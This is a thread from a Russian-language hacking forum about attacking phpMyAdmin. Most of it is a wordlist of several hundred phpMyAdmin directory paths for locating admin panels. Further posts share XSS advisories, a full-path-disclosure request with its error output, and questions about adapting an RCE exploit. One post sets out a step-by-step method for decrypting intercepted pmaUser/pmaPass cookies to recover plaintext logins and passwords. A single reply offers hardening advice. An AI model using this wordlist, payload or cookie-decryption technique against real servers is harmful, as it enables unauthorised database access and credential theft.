/phpMyAdmin-3.3.10.4/
/phpMyAdmin-3.3.10.5/
/phpMyAdmin-3.3.10/
/phpMyAdmin-3.3.2-rc1/
/phpMyAdmin-3.3.2/
/phpMyAdmin-3.3.3-rc1/
/phpMyAdmin-3.3.3/
/phpMyAdmin-3.3.4-rc1/
/phpMyAdmin-3.3.4/
/phpMyAdmin-3.3.5-rc1/
/phpMyAdmin-3.3.5.1/
/phpMyAdmin-3.3.5/
/phpMyAdmin-3.3.6-rc1/
/phpMyAdmin-3.3.6/
/phpMyAdmin-3.3.7-7/
/phpMyAdmin-3.3.7-rc1/
/phpMyAdmin-3.3.7/
/phpMyAdmin-3.3.8-rc1/
/phpMyAdmin-3.3.8.1/
/phpMyAdmin-3.3.8/
/phpMyAdmin-3.3.9-rc1/
/phpMyAdmin-3.3.9.1/
/phpMyAdmin-3.3.9.2/
/phpMyAdmin-3.3.9/
/phpMyAdmin-3.4.0-alpha1/
/phpMyAdmin-3.4.0-alpha2/
/phpMyAdmin-3.4.0-beta1/
/phpMyAdmin-3.4.0-beta2/
/phpMyAdmin-3.4.0-beta3/
/phpMyAdmin-3.4.0-beta4/
/phpMyAdmin-3.4.0-rc1/
/phpMyAdmin-3.4.0-rc2/
/phpMyAdmin-3.4.0/
/phpMyAdmin-3.4.1-rc1/
/phpMyAdmin-3.4.1/
/phpMyAdmin-3.4.10-rc1/
/phpMyAdmin-3.4.10.1/
/phpMyAdmin-3.4.10.2/
/phpMyAdmin-3.4.10/
/phpMyAdmin-3.4.11-rc1/
/phpMyAdmin-3.4.11.1/
/phpMyAdmin-3.4.11/
/phpMyAdmin-3.4.2-rc1/
/phpMyAdmin-3.4.2/
/phpMyAdmin-3.4.3-rc1/
/phpMyAdmin-3.4.3.1/
/phpMyAdmin-3.4.3.2/
/phpMyAdmin-3.4.3/
/phpMyAdmin-3.4.4-rc1/
/phpMyAdmin-3.4.4/
/phpMyAdmin-3.4.5-rc1/
/phpMyAdmin-3.4.5/
/phpMyAdmin-3.4.6-rc1/
/phpMyAdmin-3.4.6/
/phpMyAdmin-3.4.7-rc1/
/phpMyAdmin-3.4.7.1/
/phpMyAdmin-3.4.7/
/phpMyAdmin-3.4.8-rc1/
/phpMyAdmin-3.4.8/
/phpMyAdmin-3.4.9-rc1/
/phpMyAdmin-3.4.9/
/phpMyAdmin-3.5.0-alpha1/
/phpMyAdmin-3.5.0-beta1/
/phpMyAdmin-3.5.0-rc1/
/phpMyAdmin-3.5.0-rc2/
/phpMyAdmin-3.5.0/
/phpMyAdmin-3.5.1-rc1/
/phpMyAdmin-3.5.1/
/phpMyAdmin-3.5.2-rc1/
/phpMyAdmin-3.5.2.1/
/phpMyAdmin-3.5.2.2/
/phpMyAdmin-3.5.2/
/phpMyAdmin-3.5.3-rc1/
/phpMyAdmin-3.5.3/
/phpMyAdmin-3.5.4-rc1/
/phpMyAdmin-3.5.4/
/phpMyAdmin-3.5.5-rc1/
/phpMyAdmin-3.5.5/
/phpMyAdmin-3.5.6-rc1/
/phpMyAdmin-3.5.6/
/phpMyAdmin-3.5.7-rc1/
/phpMyAdmin-3.5.7/
/phpMyAdmin-3.5.8-rc1/
/phpMyAdmin-3.5.8.1/
/phpMyAdmin-3.5.8.2/
/phpMyAdmin-3.5.8/
/phpMyAdmin-3/
/phpMyAdmin-4.0.0-alpha1/
/phpMyAdmin-4.0.0-alpha2/
/phpMyAdmin-4.0.0-beta1/
/phpMyAdmin-4.0.0-beta2/
/phpMyAdmin-4.0.0-rc2/
/phpMyAdmin-4.0.0-rc3/
/phpMyAdmin-4.0.0-rc4/
/phpMyAdmin-4.0.0/
/phpMyAdmin-4.0.1-rc1/
/phpMyAdmin-4.0.1/
/phpMyAdmin-4.0.10.1/
/phpMyAdmin-4.0.10.2/
/phpMyAdmin-4.0.10.3/
/phpMyAdmin-4.0.10.4/
/phpMyAdmin-4.0.10.5/
/phpMyAdmin-4.0.10.6/
/phpMyAdmin-4.0.10.7/
/phpMyAdmin-4.0.10.8/
/phpMyAdmin-4.0.10.9/
/phpMyAdmin-4.0.10/
/phpMyAdmin-4.0.2-rc1/
/phpMyAdmin-4.0.2/
/phpMyAdmin-4.0.3-rc1/
/phpMyAdmin-4.0.3/
/phpMyAdmin-4.0.4-rc1/
/phpMyAdmin-4.0.4.1/
/phpMyAdmin-4.0.4.2/
/phpMyAdmin-4.0.4/
/phpMyAdmin-4.0.5/
/phpMyAdmin-4.0.6/
/phpMyAdmin-4.0.7/
/phpMyAdmin-4.0.8/
/phpMyAdmin-4.0.9/
/phpMyAdmin-4.1.0/
/phpMyAdmin-4.1.1/
/phpMyAdmin-4.1.10/
/phpMyAdmin-4.1.11/
/phpMyAdmin-4.1.12/
/phpMyAdmin-4.1.13/
/phpMyAdmin-4.1.14.1/
/phpMyAdmin-4.1.14.2/
/phpMyAdmin-4.1.14.3/
/phpMyAdmin-4.1.14.4/
/phpMyAdmin-4.1.14.5/
/phpMyAdmin-4.1.14.6/
/phpMyAdmin-4.1.14.7/
/phpMyAdmin-4.1.14.8/
/phpMyAdmin-4.1.14/
/phpMyAdmin-4.1.2/
/phpMyAdmin-4.1.3/
/phpMyAdmin-4.1.4/
/phpMyAdmin-4.1.5/
/phpMyAdmin-4.1.6/
/phpMyAdmin-4.1.7/
/phpMyAdmin-4.1.8/
/phpMyAdmin-4.1.9/
/phpMyAdmin-4.2.0/
/phpMyAdmin-4.2.1/
/phpMyAdmin-4.2.10.1/
/phpMyAdmin-4.2.10/
/phpMyAdmin-4.2.11/
/phpMyAdmin-4.2.12/
/phpMyAdmin-4.2.13.1/
/phpMyAdmin-4.2.13.2/
/phpMyAdmin-4.2.13/
/phpMyAdmin-4.2.2/
/phpMyAdmin-4.2.3/
/phpMyAdmin-4.2.4/
/phpMyAdmin-4.2.5/
/phpMyAdmin-4.2.6/
/phpMyAdmin-4.2.7.1/
/phpMyAdmin-4.2.7/
/phpMyAdmin-4.2.8.1/
/phpMyAdmin-4.2.8/
/phpMyAdmin-4.2.9.1/
/phpMyAdmin-4.2.9/
/phpMyAdmin-4.3.0-alpha1/
/phpMyAdmin-4.3.0-beta1/
/phpMyAdmin-4.3.0-rc1/
/phpMyAdmin-4.3.0-rc2/
/phpMyAdmin-4.3.0/
/phpMyAdmin-4.3.1/
/phpMyAdmin-4.3.10/
/phpMyAdmin-4.3.11.1/
/phpMyAdmin-4.3.11/
/phpMyAdmin-4.3.12/
/phpMyAdmin-4.3.13/
/phpMyAdmin-4.3.2/
/phpMyAdmin-4.3.3/
/phpMyAdmin-4.3.4/
/phpMyAdmin-4.3.5/
/phpMyAdmin-4.3.6/
/phpMyAdmin-4.3.7/
/phpMyAdmin-4.3.8/
/phpMyAdmin-4.3.9/
/phpMyAdmin-4.4.0-alpha1/
/phpMyAdmin-4.4.0-rc1/
/phpMyAdmin-4/
/phpmyadmin-RELEASE_2_10_0/
/phpmyadmin-RELEASE_2_10_0_1/
/phpmyadmin-RELEASE_2_10_0_2/
/phpmyadmin-RELEASE_2_10_0RC1/
/phpmyadmin-RELEASE_2_10_1RC1/
/phpmyadmin-RELEASE_2_10_2/
/phpmyadmin-RELEASE_2_10_3/
/phpmyadmin-RELEASE_2_10_3RC1/
/phpmyadmin-RELEASE_2_11_0/
/phpmyadmin-RELEASE_2_11_0RC2/
/phpmyadmin-RELEASE_2_11_1/
/phpmyadmin-RELEASE_2_11_1_1/
/phpmyadmin-RELEASE_2_11_1_2/
/phpmyadmin-RELEASE_2_11_10/
/phpmyadmin-RELEASE_2_11_10_1/
/phpmyadmin-RELEASE_2_11_11/
/phpmyadmin-RELEASE_2_11_11_1/
/phpmyadmin-RELEASE_2_11_11_2/
/phpmyadmin-RELEASE_2_11_11_3/
/phpmyadmin-RELEASE_2_11_11RC1/
/phpmyadmin-RELEASE_2_11_1RC1/
/phpmyadmin-RELEASE_2_11_2/
/phpmyadmin-RELEASE_2_11_2_1/
/phpmyadmin-RELEASE_2_11_2_2/
/phpmyadmin-RELEASE_2_11_2RC1/
/phpmyadmin-RELEASE_2_11_3/
/phpmyadmin-RELEASE_2_11_3RC1/
/phpmyadmin-RELEASE_2_11_4/
/phpmyadmin-RELEASE_2_11_4RC1/
/phpmyadmin-RELEASE_2_11_5/
/phpmyadmin-RELEASE_2_11_5_1/
/phpmyadmin-RELEASE_2_11_5_2/
/phpmyadmin-RELEASE_2_11_5RC1/
/phpmyadmin-RELEASE_2_11_6/
/phpmyadmin-RELEASE_2_11_6RC1/
/phpmyadmin-RELEASE_2_11_7/
/phpmyadmin-RELEASE_2_11_7_1/
/phpmyadmin-RELEASE_2_11_7RC1/
/phpmyadmin-RELEASE_2_11_7RC2/
/phpmyadmin-RELEASE_2_11_8/
/phpmyadmin-RELEASE_2_11_8_1/
/phpmyadmin-RELEASE_2_11_8RC1/
/phpmyadmin-RELEASE_2_11_9/
/phpmyadmin-RELEASE_2_11_9_1/
/phpmyadmin-RELEASE_2_11_9_2/
/phpmyadmin-RELEASE_2_11_9_3/
/phpmyadmin-RELEASE_2_11_9_4/
/phpmyadmin-RELEASE_2_11_9_5/
/phpmyadmin-RELEASE_2_11_9_6/
/phpmyadmin-RELEASE_2_2_0/
/phpmyadmin-RELEASE_2_2_1/
/phpmyadmin-RELEASE_2_2_2/
/phpmyadmin-RELEASE_2_2_3/
/phpmyadmin-RELEASE_2_2_4/
/phpmyadmin-RELEASE_2_2_5/
/phpmyadmin-RELEASE_2_2_6/
/phpmyadmin-RELEASE_2_2_7PL1/
/phpmyadmin-RELEASE_2_3_0/
/phpmyadmin-RELEASE_2_3_1/
/phpmyadmin-RELEASE_2_3_2/
/phpmyadmin-RELEASE_2_3_3PL1/
/phpmyadmin-RELEASE_2_4_0/
/phpmyadmin-RELEASE_2_5_0/
/phpmyadmin-RELEASE_2_5_1/
/phpmyadmin-RELEASE_2_5_2/
/phpmyadmin-RELEASE_2_5_4/
/phpmyadmin-RELEASE_2_5_5PL1/
/phpmyadmin-RELEASE_2_5_6/
/phpmyadmin-RELEASE_2_6_1PL3/
/phpmyadmin-RELEASE_2_7_0PL2/
/phpmyadmin-RELEASE_2_8_0_4/
/phpmyadmin-RELEASE_2_8_1/
/phpmyadmin-RELEASE_2_8_2_4/
/phpmyadmin-RELEASE_2_9_0/
/phpmyadmin-RELEASE_2_9_0_1/
/phpmyadmin-RELEASE_2_9_0_2/
/phpmyadmin-RELEASE_2_9_1_1/
/phpmyadmin-RELEASE_2_9_2/
/phpmyadmin-RELEASE_2_9_2RC1/
/phpmyadmin-RELEASE_3_0_0/
/phpmyadmin-RELEASE_3_0_0ALPHA/
/phpmyadmin-RELEASE_3_0_0RC2/
/phpmyadmin-RELEASE_3_0_1/
/phpmyadmin-RELEASE_3_0_1_1/
/phpmyadmin-RELEASE_3_0_1RC1/
/phpmyadmin-RELEASE_3_1_0/
/phpmyadmin-RELEASE_3_1_0BETA1/
/phpmyadmin-RELEASE_3_1_0RC1/
/phpmyadmin-RELEASE_3_1_1/
/phpmyadmin-RELEASE_3_1_2/
/phpmyadmin-RELEASE_3_1_2RC1/
/phpmyadmin-RELEASE_3_1_3/
/phpmyadmin-RELEASE_3_1_3_1/
/phpmyadmin-RELEASE_3_1_3_2/
/phpmyadmin-RELEASE_3_1_3RC1/
/phpmyadmin-RELEASE_3_1_4/
/phpmyadmin-RELEASE_3_1_4RC1/
/phpmyadmin-RELEASE_3_1_4RC2/
/phpmyadmin-RELEASE_3_1_5/
/phpmyadmin-RELEASE_3_1_5RC1/
/phpmyadmin-RELEASE_3_2_0/
/phpmyadmin-RELEASE_3_2_0_1/
/phpmyadmin-RELEASE_3_2_0BETA1/
/phpmyadmin-RELEASE_3_2_0RC1/
/phpmyadmin-RELEASE_3_2_2/
/phpmyadmin-RELEASE_3_2_2_1/
/phpmyadmin-RELEASE_3_2_2RC1/
/phpmyadmin-RELEASE_3_2_3/
/phpmyadmin-RELEASE_3_2_3RC1/
/phpmyadmin-RELEASE_3_2_4/
/phpmyadmin-RELEASE_3_2_4RC1/
/phpmyadmin-RELEASE_3_2_5/
/phpmyadmin-RELEASE_3_2_5RC1/
/phpmyadmin-RELEASE_3_2_5RC2/
/phpmyadmin-RELEASE_3_3_0/
/phpmyadmin-RELEASE_3_3_0ALPHA1/
/phpmyadmin-RELEASE_3_3_0BETA1/
/phpmyadmin-RELEASE_3_3_0RC1/
/phpmyadmin-RELEASE_3_3_0RC2/
/phpmyadmin-RELEASE_3_3_0RC3/
/phpmyadmin-RELEASE_3_3_1/
/phpmyadmin-RELEASE_3_3_10/
/phpmyadmin-RELEASE_3_3_10_1/
/phpmyadmin-RELEASE_3_3_10_2/
/phpmyadmin-RELEASE_3_3_10_3/
/phpmyadmin-RELEASE_3_3_10_4/
/phpmyadmin-RELEASE_3_3_10_5/
/phpmyadmin-RELEASE_3_3_10RC1/
/phpmyadmin-RELEASE_3_3_1RC1/
/phpmyadmin-RELEASE_3_3_2/
/phpmyadmin-RELEASE_3_3_2RC1/
/phpmyadmin-RELEASE_3_3_3/
/phpmyadmin-RELEASE_3_3_3RC1/
/phpmyadmin-RELEASE_3_3_4/
/phpmyadmin-RELEASE_3_3_4RC1/
/phpmyadmin-RELEASE_3_3_5/
/phpmyadmin-RELEASE_3_3_5_1/
/phpmyadmin-RELEASE_3_3_5RC1/
/phpmyadmin-RELEASE_3_3_6/
/phpmyadmin-RELEASE_3_3_6RC1/
/phpmyadmin-RELEASE_3_3_7/
/phpmyadmin-RELEASE_3_3_7RC1/
/phpmyadmin-RELEASE_3_3_8/
/phpmyadmin-RELEASE_3_3_8_1/
/phpmyadmin-RELEASE_3_3_8RC1/
/phpmyadmin-RELEASE_3_3_9/
/phpmyadmin-RELEASE_3_3_9_1/
/phpmyadmin-RELEASE_3_3_9_2/
/phpmyadmin-RELEASE_3_3_9RC1/
/phpmyadmin-RELEASE_3_4_0/
/phpmyadmin-RELEASE_3_4_0ALPHA1/
/phpmyadmin-RELEASE_3_4_0ALPHA2/
/phpmyadmin-RELEASE_3_4_0BETA1/
/phpmyadmin-RELEASE_3_4_0BETA2/
/phpmyadmin-RELEASE_3_4_0BETA3/
/phpmyadmin-RELEASE_3_4_0BETA4/
/phpmyadmin-RELEASE_3_4_0RC1/
/phpmyadmin-RELEASE_3_4_0RC2/
/phpmyadmin-RELEASE_3_4_1/
/phpmyadmin-RELEASE_3_4_10/
/phpmyadmin-RELEASE_3_4_10_1/
/phpmyadmin-RELEASE_3_4_10_2/
/phpmyadmin-RELEASE_3_4_10RC1/
/phpmyadmin-RELEASE_3_4_11/
/phpmyadmin-RELEASE_3_4_11_1/
/phpmyadmin-RELEASE_3_4_11RC1/
/phpmyadmin-RELEASE_3_4_1RC1/
/phpmyadmin-RELEASE_3_4_2/
/phpmyadmin-RELEASE_3_4_2RC1/
/phpmyadmin-RELEASE_3_4_3/
/phpmyadmin-RELEASE_3_4_3_1/
/phpmyadmin-RELEASE_3_4_3_2/
/phpmyadmin-RELEASE_3_4_3RC1/
/phpmyadmin-RELEASE_3_4_4/
/phpmyadmin-RELEASE_3_4_4RC1/
/phpmyadmin-RELEASE_3_4_5/
/phpmyadmin-RELEASE_3_4_5RC1/
/phpmyadmin-RELEASE_3_4_6/
/phpmyadmin-RELEASE_3_4_6RC1/
/phpmyadmin-RELEASE_3_4_7/
/phpmyadmin-RELEASE_3_4_7_1/
/phpmyadmin-RELEASE_3_4_7RC1/
/phpmyadmin-RELEASE_3_4_8/
/phpmyadmin-RELEASE_3_4_8RC1/
/phpmyadmin-RELEASE_3_4_9/
/phpmyadmin-RELEASE_3_4_9RC1/
/phpmyadmin-RELEASE_3_5_0/
/phpmyadmin-RELEASE_3_5_0ALPHA1/
/phpmyadmin-RELEASE_3_5_0BETA1/
/phpmyadmin-RELEASE_3_5_0RC1/
/phpmyadmin-RELEASE_3_5_0RC2/
/phpmyadmin-RELEASE_3_5_1/
/phpmyadmin-RELEASE_3_5_1RC1/
/phpmyadmin-RELEASE_3_5_2/
/phpmyadmin-RELEASE_3_5_2_1/
/phpmyadmin-RELEASE_3_5_2_2/
/phpmyadmin-RELEASE_3_5_2RC1/
/phpmyadmin-RELEASE_3_5_3/
/phpmyadmin-RELEASE_3_5_3RC1/
/phpmyadmin-RELEASE_3_5_4/
/phpmyadmin-RELEASE_3_5_4RC1/
/phpmyadmin-RELEASE_3_5_5/
/phpmyadmin-RELEASE_3_5_5RC1/
/phpmyadmin-RELEASE_3_5_6/
/phpmyadmin-RELEASE_3_5_6RC1/
/phpmyadmin-RELEASE_3_5_7/
/phpmyadmin-RELEASE_3_5_7RC1/
/phpmyadmin-RELEASE_3_5_8/
/phpmyadmin-RELEASE_3_5_8_1/
/phpmyadmin-RELEASE_3_5_8RC1/
/phpmyadmin-RELEASE_4_0_0/
/phpmyadmin-RELEASE_4_0_0ALPHA1/
/phpmyadmin-RELEASE_4_0_0ALPHA2/
/phpmyadmin-RELEASE_4_0_0BETA1/
/phpmyadmin-RELEASE_4_0_0BETA2/
/phpmyadmin-RELEASE_4_0_0RC2/
/phpmyadmin-RELEASE_4_0_0RC3/
/phpmyadmin-RELEASE_4_0_0RC4/
/phpmyadmin-RELEASE_4_0_1/
/phpmyadmin-RELEASE_4_0_10_1/
/phpmyadmin-RELEASE_4_0_10_2/
/phpmyadmin-RELEASE_4_0_10_3/
/phpmyadmin-RELEASE_4_0_10_4/
/phpmyadmin-RELEASE_4_0_10_5/
/phpmyadmin-RELEASE_4_0_10_6/
/phpmyadmin-RELEASE_4_0_10_7/
/phpmyadmin-RELEASE_4_0_10_8/
/phpmyadmin-RELEASE_4_0_10_9/
/phpmyadmin-RELEASE_4_0_1RC1/
/phpmyadmin-RELEASE_4_0_2/
/phpmyadmin-RELEASE_4_0_2RC1/
/phpmyadmin-RELEASE_4_0_3/
/phpmyadmin-RELEASE_4_0_3RC1/
/phpmyadmin-RELEASE_4_0_4RC1/
/phpmyadmin-RELEASE_4_1_14_2/
/phpmyadmin-RELEASE_4_1_14_3/
/phpmyadmin-RELEASE_4_1_14_4/
/phpmyadmin-RELEASE_4_1_14_5/
/phpmyadmin-RELEASE_4_1_14_6/
/phpmyadmin-RELEASE_4_1_14_7/
/phpmyadmin-RELEASE_4_1_14_8/
/phpmyadmin-RELEASE_4_2_10/
/phpmyadmin-RELEASE_4_2_10_1/
/phpmyadmin-RELEASE_4_2_11/
/phpmyadmin-RELEASE_4_2_12/
/phpmyadmin-RELEASE_4_2_13/
/phpmyadmin-RELEASE_4_2_13_1/
/phpmyadmin-RELEASE_4_2_13_2/
/phpmyadmin-RELEASE_4_2_6/
/phpmyadmin-RELEASE_4_2_7/
/phpmyadmin-RELEASE_4_2_7_1/
/phpmyadmin-RELEASE_4_2_8/
/phpmyadmin-RELEASE_4_2_8_1/
/phpmyadmin-RELEASE_4_2_9/
/phpmyadmin-RELEASE_4_2_9_1/
/phpmyadmin-RELEASE_4_3_0/
/phpmyadmin-RELEASE_4_3_0ALPHA1/
/phpmyadmin-RELEASE_4_3_0BETA1/
/phpmyadmin-RELEASE_4_3_0RC1/
/phpmyadmin-RELEASE_4_3_0RC2/
/phpmyadmin-RELEASE_4_3_1/
/phpmyadmin-RELEASE_4_3_10/
/phpmyadmin-RELEASE_4_3_11/
/phpmyadmin-RELEASE_4_3_11_1/
/phpmyadmin-RELEASE_4_3_12/
/phpmyadmin-RELEASE_4_3_13/
/phpmyadmin-RELEASE_4_3_2/
/phpmyadmin-RELEASE_4_3_3/
/phpmyadmin-RELEASE_4_3_4/
/phpmyadmin-RELEASE_4_3_5/
/phpmyadmin-RELEASE_4_3_6/
/phpmyadmin-RELEASE_4_3_7/
/phpmyadmin-RELEASE_4_3_8/
/phpmyadmin-RELEASE_4_3_9/
/phpmyadmin-RELEASE_4_4_0ALPHA1/
/phpmyadmin/
/phpmyadmin_/
/phpMyAdmin_/
/phpmyadmin_1/
/phpMyAdmin_1/
/phpMyAdmin1/
/phpmyadmin123/
/phpmyadmin2/
/phpMyAds/
/pma/
/PMA/
/pma1/
/pma2005/
/PMA2005/
/sqlmanager/
/sqlweb/
/web/phpMyAdmin/
/webadmin/
/webdb/
/websql/

phpmyadmin 3.4.8 есть ли что нибудь под это?

↑ (https://antichat.live/posts/3904796/)
phpmyadmin 3.4.8 есть ли что нибудь под это?


Cross-Site-Scripting (https://packetstormsecurity.com/files/108110/phpMyAdmin-3.4.8-Cross-Site-Scripting.html)

Для страждущих - определение версии > 4.x:

http://[target_site]/[pma]/doc/html/index.html

phpMyAdmin up to 4.0.10.14/4.4.15.4/4.5.5.0 server_privileges.lib.php cross site scripting

http://www.scip.ch/en/?vuldb.81135 (http://www.scip.ch/en/?vuldb.81135)

phpMyAdmin up to 4.5.5.0 X.509 Certificate Validation Config.class.php checkHTTP information disclosure

http://www.scip.ch/en/?vuldb.81137 (http://www.scip.ch/en/?vuldb.81137)

phpMyAdmin up to 4.4.15.4/4.5.5.0 cross site scripting [CVE-2016-2561]

http://www.scip.ch/en/?vuldb.81136

Подскажите, какие есть XSS не требующие авторизации для версий от 2.11?

Хорошо, тогда подскажите как можно вписать alert() в странице "http://***.org/phpMyAdmin/error.php?type=ErrorHeader&error=TextForError", если в параметрах можно подставлять только тэги типa:

'' => '',

'' => '',

'' => '',

'' => '',

'' => '',

'' => '',

'' => '',

'' => '',

'' => '',

'' => '',

'[*code]' => '',

'[*/code]' => '',

'' => '',

'' => '',

'[br]' => '
',

'[/a]' => '',

'' => '',

'' => '',

full path disclosure

проверял на 4.0.8. в какой версии пофиксили не могу сказать

http://site.com/myadmin/js/get_scripts.js.php?scripts[][]=123


Warning: explode() expects parameter 2 to be string, array given in /var/www/shared_test/myadmin/js/get_scripts.js.php on line 20

Warning: Invalid argument supplied for foreach() in /var/www/shared_test/myadmin/js/get_scripts.js.php on line 21

Вопрос по эксплоиту CVE-2016-5734 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5734) https://www.exploit-db.com/exploits/40185/

Данный эксплоит для версий PhpMyAdmin 4.3.0 - 4.6.2, на моем сайте версия 4.0.10.15, она так же уязвима(просто эксплоит другой), эта уязвимость присутствует на моей версии, но эксплоит собрать, увы, не могу, по причине того что отсутствует файл /tbl_find_replace.php , на моей версии не было его еще.

Помогите, может кто сталкивался с подобным, в сторону какого файла копать, известно только как пофиксили багу на этой версии, https://github.com/phpmyadmin/phpmyadmin/commit/351019c

Какой конкретно файл цепляет libraries/tbl_columns_definition_form.inc.php, без понятия

подскажите пожалуйста, с пма вообще практически не знаком

Ребят что известно по поводу

phpMyAdmin PMASA-2017-8 Security Bypass Vulnerability

?

phpMyAdmin 4.8.x LFI to RCE (Authorization Required)

http://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-Authorited-CLI-to-RCE/

под version 4.5.1 есть что ?

Расшифровка логина и пароля в cookie pmaUser-1 и pmaPass-1

Когда вход в phpMyAdmin осуществляется через ISPManager, сервер возвращает такие заголовки:


Set-Cookie:pmaPass-1=WwazS5W8AMLiKAjA%2FGglKg%3D%3D; path=/phpmyadmin/; httponly
Set-Cookie:pmaUser-1=4LIGuDEVD8XTNAQOvaGeCg%3D%3D; expires=Thu, 07-Apr-2016 17:50:34

Можно подставить эти cookie себе и успешно зайти в phpMyAdmin, но это неудобно, так как cookie могут умереть.

Сам файл отвечающий за эти cookie находится по пути /libraries/auth/cookie.auth.lib.php:


$GLOBALS['PHP_AUTH_PW'] =PMA_blowfish_decrypt($_COOKIE['pmaPass-'.$GLOBALS['server']],PMA_get_blowfish_secret());


Функция PMA_get_blowfish_secret() ищет соль в конфиге phpMyAdmin.

В том же файле есть такие строки:


if ($GLOBALS['cfg']['LoginCookieRecall'] && !empty($GLOBALS['cfg']['blowfish_secret'])) {
$default_user=$GLOBALS['PHP_AUTH_USER'];
$default_server=$GLOBALS['pma_auth_server'];
$autocomplete='';
}


Далее сам вывод:


" size="24" class="textfield"/>[/COLOR]

Алгоритм эксплуатации:

1) Перехватываем cookie (XSS, memory leak и т.д.)

2) Вставляем cookie pmaUser-1 и несколько раз обновляем страницу авторизации, получаем расшифрованный логин

3) Меняем значение cookie pmaUser-1 на значение из перехваченного pmaPass-1 и несколько раз обновляем страницу авторизации, получаем расшифрованный пароль

В посте представлены исходники phpMyAdmin 3.5.0, соответственно, тестировалось тоже на нем. Но думаю это есть во многих версиях, если но во всех. В роли генератора выступил ISPManager 4 Lite.

P.S. В google не нашел как их расшифровать, видимо информация пока неизвестная или слишком очевидная. Уязвимостью это назвать сложно, так как эти cookie сначала надо перехватить.

А чем можно перебирать эту базу? и как изменить путь до phpmyadmin? чтобы к примеру этот список не поймал


↑ (https://antichat.live/posts/3859353/)
Недавно делал себе словарик для поиска. Может кому пригодится.

/_phpMyAdmin/
/admin/
/admin/mysql/
/admin/phpmyadmin/
/....................
........
/phpmyadmin-RELEASE_3_4_10_1/
/phpmyadmin-RELEASE_3_4_10_2/
/............

↑ (https://antichat.live/posts/4322094/)
и как изменить путь до phpmyadmin?


к примеру debian https://www.digitalocean.com/community/tutorials/how-to-install-and-secure-phpmyadmin-on-debian-9

в других ОС такой же принцип, ищем конфиг и меняем алиас и докидываем в папку basic-auth через .htaccess ну и саму папку переименуйте как нужно к прмиеру pma007_MBDSS82347823sdhjsd усё

Интересная тема, спасибо, давно искал что-то подобное